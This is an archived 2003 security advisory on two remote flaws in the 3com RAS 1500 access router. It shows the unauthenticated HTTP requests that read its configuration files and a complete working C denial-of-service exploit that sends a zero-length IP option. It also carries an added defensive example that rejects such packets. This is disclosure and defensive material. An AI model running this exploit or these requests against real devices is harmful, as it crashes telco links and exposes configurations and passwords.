[VulnWatch] 3com RAS 1500 Remote vulnerabilities.

From: Piotr Chytla (pch@isec.pl)
Date: 03/24/03

    Date: Mon, 24 Mar 2003 16:56:21 +0100 (CET)
    From: Piotr Chytla <pch@isec.pl>
    To: bugtraq@securityfocus.com, <vulnwatch@vulnwatch.org>
    
    


    Synopsis: 3com RAS 1500 Remote vulnerabilities.
    Product: 3C433279A-US http://www.3com/ras1500
    Version: Firmware X2.0.10

    URL: http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt
    Author: Piotr Chytla <pch@isec.pl>
    Date: February 27, 2003

    Issue:
    ------

     The 3com SuperStack II Remote Access System 1500 is a telco device that
     provides dial-in users with access over BRI-ISDN/analog lines.
     It contains two remote vulnerabilities: the first is a Denial of Service
     that leads to a system crash; the second can be used to read configuration
     files.

    Details:
    -------

    1. Remote Denial of Service

     It is possible to remotely reboot the RAS 1500 (Router unit) by sending a
     malformed packet whose IP option length field is set to zero. This bug can
     cause the loss of all switched connections on the PRI-ISDN interface.
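Added example, not part of the advisory: a bounds-checked IPv4 option walker that rejects a zero-length option instead of advancing by it. The constructed header carries the same option shape the proof of concept below sends (type 0xe4, length byte 0); the verdict constants and the assumption that an unchecked parser would fail to advance on that length are this example's own, not statements from the advisory.

```c
#include <stdint.h>
#include <stddef.h>
/* Verdicts returned by the checks below (constants are this example's own). */
enum ipopt_verdict { IPOPT_OK = 0, IPOPT_BAD_LEN = -1, IPOPT_TRUNCATED = -2 };

/* Walk the options area that follows the fixed 20-byte IPv4 header. A parser
 * that simply adds the length byte never moves past a zero-length option. */
int ipv4_check_options(const uint8_t *opts, size_t optlen)
{
    size_t i = 0;
    while (i < optlen) {
        uint8_t type = opts[i];
        if (type == 0)                 /* EOL: end of option list */
            return IPOPT_OK;
        if (type == 1) {               /* NOP: one byte, no length field */
            i++;
            continue;
        }
        if (i + 1 >= optlen)           /* length byte is missing */
            return IPOPT_TRUNCATED;
        uint8_t len = opts[i + 1];
        if (len < 2)                   /* 0 or 1 can never advance: reject */
            return IPOPT_BAD_LEN;
        if (i + len > optlen)          /* option claims bytes beyond the header */
            return IPOPT_TRUNCATED;
        i += len;
    }
    return IPOPT_OK;
}

/* Validate IHL against the buffer, then check the options area it covers. */
int ipv4_header_options_ok(const uint8_t *hdr, size_t buflen)
{
    if (buflen < 20) return IPOPT_TRUNCATED;
    size_t ihl = (size_t)(hdr[0] & 0x0f) * 4;
    if (ihl < 20 || ihl > buflen) return IPOPT_TRUNCATED;
    return ipv4_check_options(hdr + 20, ihl - 20);
}

/* Constructed sample: IHL=6 header carrying one option with type 0xe4 and a
 * zero length byte, the shape the advisory's proof of concept sends. */
int example_malformed_verdict(void)
{
    static const uint8_t hdr[24] = {
        0x46, 0x00, 0x00, 0x18, 0x13, 0x37, 0x00, 0x00, 0xff, 0xaa, 0x00, 0x00,
        192, 0, 2, 1, 192, 0, 2, 2,          /* src/dst: documentation addresses */
        0xe4, 0x00, 0x00, 0x00 };            /* type, len=0, padding */
    return ipv4_header_options_ok(hdr, sizeof hdr);   /* -> IPOPT_BAD_LEN */
}
```

Run over a captured header, the same check gives a firewall or IDS in front of the router unit a verdict to drop the packet on.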

    2. Configuration file read

     An unauthorized user can read configuration and system files through the
     RAS 1500 web interface.
     
        GET /download.htm HTTP/1.0
        HTTP/1.0 401 Unauthorized
        WWW-Authenticate: Basic realm="RAS1500"
        Content-Type: text/html
        Server: Allegro-Software-RomPager/2.10
     
        GET /user_settings.cfg HTTP/1.0
        HTTP/1.0 200 OK
        Content-Type: multipart
        Date: Mon, 25 May 1998 00:26:38 GMT
        Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT
        Content-Length: 1258
        Server: Allegro-Software-RomPager/2.10
        [..]
        
        content of user_setting.cfg

     The RAS 1500 requires HTTP basic authentication only for the download.htm
     file, which is the download manager for configuration files and system
     software. Unfortunately, the system images and configuration files
     themselves are not protected by HTTP authentication.

    Impact:
    -------
     
     A malicious user is able to remotely crash the RAS 1500 Router Unit, which
     drops all switched connections on the PRI-ISDN interface.
     A remote attacker can also read the RAS configuration and, once the access
     passwords have been broken, modify it.

    Exploit:
    --------
    Below is attached a working proof-of-concept exploit for vulnerability no. 1.
     
    ------X<------isec-options.c------X<------
    /*
     * 3com superstack II RAS 1500 remote Denial of Service
     *
     * Piotr Chytla <pch@isec.pl>
     *
     * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
     * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
     *
     * (c) 2003 Copyright by iSEC Security Research
     */
     
    #include <stdio.h>
    #include <stdlib.h>      /* exit() */
    #include <string.h>      /* strlen(), memcpy() */
    #include <strings.h>     /* bzero() */
    #include <unistd.h>      /* getopt(), optarg */
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <libnet.h>      /* libnet 1.0 API */
    #define OPT_LEN 4        /* one 4-byte IP option: type, length, two data bytes */
    void usage()
    {
      printf("Args: \n");
      printf("-s [source address]\n");
      printf("-d [destination address]\n");
    }

    int main(int argc,char *argv[])
    {
     int a;                  /* getopt() returns int (-1 at end of arguments) */
     int sock,r;
     u_long src = 0;
     u_long dst = 0;
     char pktbuf[IP_MAXPACKET];
     char payload[]="ABCDEFGHIJKLMNOPRST";
     u_char options[4];      /* raw bytes of the single IP option */
     struct ipoption ipopt;
     bzero(options,OPT_LEN);
     while((a=getopt(argc,argv,"d:s:h?"))!=EOF)
     {
         switch(a) {
             case 'h' : { usage(); exit(1); }
             case 's' : { src=libnet_name_resolve(optarg,0); break;}
             case 'd' : { dst=libnet_name_resolve(optarg,0); break;}
            }
     }
     sock = libnet_open_raw_sock(IPPROTO_RAW);
     if (sock<0)
     {
     perror("socket");
     exit(1);
     }

     libnet_build_ip(strlen(payload),0,0x1337,0,255,0xaa,src,dst,payload,strlen(payload),pktbuf);
      /* build one IP option: type 0xe4, length byte zero, two padding bytes */
      memcpy(ipopt.ipopt_list, options, OPT_LEN);
      *(ipopt.ipopt_list)   = 0xe4;   /* option type */
      *(ipopt.ipopt_list+1) = 0;      /* option length: the malformed value */
      *(ipopt.ipopt_list+2) = 0;
      *(ipopt.ipopt_list+3) = 0;
      r=libnet_insert_ipo(&ipopt,OPT_LEN,pktbuf);
      if (r <0)
       {
            libnet_close_raw_sock(sock);
            printf("Error ip options insertion failed\n");
            exit(1);
       }
      r=libnet_write_ip(sock,pktbuf,LIBNET_IP_H+OPT_LEN+strlen(payload));
      if (r<0)
      {
       libnet_close_raw_sock(sock);
       printf("Error write_ip \n");
       exit(1);
      }
     libnet_close_raw_sock(sock);
     return 0;
    }

    ------X<------isec-options.c------X<------
     
    --
    Piotr Chytla
    iSEC Security Research
    http://isec.pl/


